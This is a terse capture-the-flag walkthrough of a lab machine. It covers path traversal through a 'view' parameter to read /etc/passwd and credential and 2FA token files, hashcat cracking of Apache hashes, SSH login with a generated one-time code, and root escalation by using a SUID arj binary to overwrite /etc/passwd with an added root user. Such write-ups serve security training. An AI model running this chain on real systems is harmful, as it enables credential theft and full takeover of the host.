G00g

Enumeration

http://192.168.145.144

Basic login:
admin:admin

In page source:
<!-- itemir/apache_2fa -->

https://github.com/itemir/apache_2fa

POST /checkpost.php HTTP/1.1
...
job=ps

The response:
HTTP/1.1 302 Found
Location: /index.php?workon=am9iPXBz

am9iPXBz -> Base64 decoded job=ps

View Result -> /spool/viewresult.php?view=192.168.49.145_1639874661.txt

Directory traversal -> view parameter

- /viewresult.php?view=/etc/passwd

fox:x:1000:1000::/home/fox:/bin/sh

- /viewresult.php?view=/etc/apache2/apache2.conf

- /viewresult.php?view=/etc/apache2/sites-enabled/000-default.conf

AuthUserFile /opt/apache_2fa/apache_credentials

- /viewresult.php?view=/opt/apache_2fa/apache_credentials

admin:$apr1$pa.RhgPO$18S/xeIW24UvBgjVJJXiC1
fox:$apr1$[REDACTED]

$ hashcat -m 1600 -w 4 -a 0 hash.txt ~/Desktop/rockyou.txt --force
admin:admin
fox:[REDACTED]

$ ssh fox@192.168.145.144
(fox@192.168.145.144) Verification code:?

https://github.com/itemir/apache_2fa/blob/master/tokens.json

/viewresult.php?view=/opt/apache_2fa/tokens.json

{
  "admin": "ND4LKCSFMUQISO6CBZQATLDP",
  "fox": "[REDACTED]"
}

Firefox plugin -> https://addons.mozilla.org/en-US/firefox/addon/auth-helper/

Add -> Manual Entry -> Use this secret:"[REDACTED]" to generate code.

Initial Access

$ ssh fox@192.168.145.144
(fox@192.168.145.144) Verification code:

PrivEsc

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/arj

$ cd /tmp
$ cp /etc/passwd passwd
$ echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
$ arj a priv passwd
$ arj x priv.arj /etc/
→ Yes

$su ch
Password: pass123